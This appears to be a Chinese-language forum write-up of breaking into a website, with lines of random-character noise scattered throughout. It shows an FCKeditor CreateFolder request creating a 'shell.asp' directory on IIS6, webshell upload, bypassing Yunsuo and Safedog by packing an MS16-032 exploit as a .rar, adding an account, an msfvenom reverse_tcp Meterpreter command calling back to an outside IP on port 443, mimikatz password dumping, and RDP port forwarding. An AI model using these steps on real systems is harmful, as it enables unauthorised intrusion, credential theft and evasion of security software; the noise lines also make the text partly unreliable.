|
$ [; q. U1 U7 p 0 o$ s4 {3 w; y5 t
" V- ]+ e" O! {. R
$ E0 X: j+ t1 I* v" c5 K# c3 p | ( O2 Y9 P/ d6 |1 r# I( r3 U j5 Y
D5 g3 i* j* }
7 b# @2 O: A& k, L$ F一、 利用getwebshell篇 6 ^ m2 g9 e6 [0 H/ {
/ Z( ~+ Z" e4 G4 d6 m
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
1 C% U. A1 }+ e1 s7 ^: o/ B 7 j, Y. Y; t/ [6 W, J3 R
 2 R' m$ H- Q1 U; O' j, z
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 d- |+ z" c9 ~& Y - Z1 ~$ n* ]! H. `8 q
下面我们构造一个asp目录,如:
& G, j- ~* K% D% N, H& M" ~
& n/ ~; u8 j( _) B/ f% u d! v2 i' M! O5 x( W, Z& H& A& E
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
, [* ^7 @- [3 S0 }8 u$ h/ ?
1 g, Z+ x/ v2 F! Z1 v" P8 w ( R% @7 n( f* G
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 / g4 D: H, l# Q1 h! x7 T
5 R p1 S; U$ y7 M: c$ `7 s一、 绕过安全狗云锁提权并且加账号 3 S0 }4 E: m! v' w, ~6 F. X$ _
 0 i7 Q' W% `5 F: g
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 # g8 C0 m% w. Y3 ^; Y
# [' J W @8 o0 R. ~& V7 s如图:
1 a7 _, G/ L" X- o8 m% B & r* A7 p: N. [, a [3 k
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit M3 Y5 C, Q: L% G# n+ A
9 v" i% z/ Z5 o2 b7 R5 u2 W
一、 利用metasploit 6 m3 M$ V- {3 j7 j% ^9 k( W3 X
; o' A) M) s6 u; M首先用pentestbox生成一个64位的payload如下命令 ! J/ ~5 d" R" k
( ~1 ^$ s9 ^! m5 v: F1 k1 i
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
2 a& X# H* C2 Z+ Z ( R) x. I0 @4 n7 H. G$ Q: Z* W+ g
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
' M- p2 E5 f. a0 K. w- u
0 ^& J% i( T9 D( U. F下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: ; t+ c- X: A9 g

8 U# [3 ~ s* t" A) x7 s下面我们来做一个监听如下命令:
( ?6 ~5 s) X" h0 j' u; i% l 3 u+ |. D: n1 n/ j
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: : f1 T3 ]+ ` e
* X- I0 |& [: w/ P% B/ O # c9 U9 q5 j3 t8 d1 E+ g5 V6 o; g
| ! M7 E7 G$ c O3 W$ g" h4 A
7 q j+ W8 |9 ]: p+ L, S/ O0 x
! s1 M/ O: A2 k E . [6 n1 E8 H: P" I/ q- ]
0 o4 F" B) I* a# F3 p: o
# X) g/ B! [1 T: C " O' q% }; [( y* |3 g8 h+ T" w7 \/ u
: s! l# z6 [ k7 M
! T* p. X7 J" R$ H* |* Q
& D( K" A7 }8 Z. L9 p/ z
" [. y) B* \, o7 h , @( l" O% m S2 A: J7 X6 J- i
. F. {' P6 X3 |$ R, u
1 z$ K( ? T6 z) V/ I |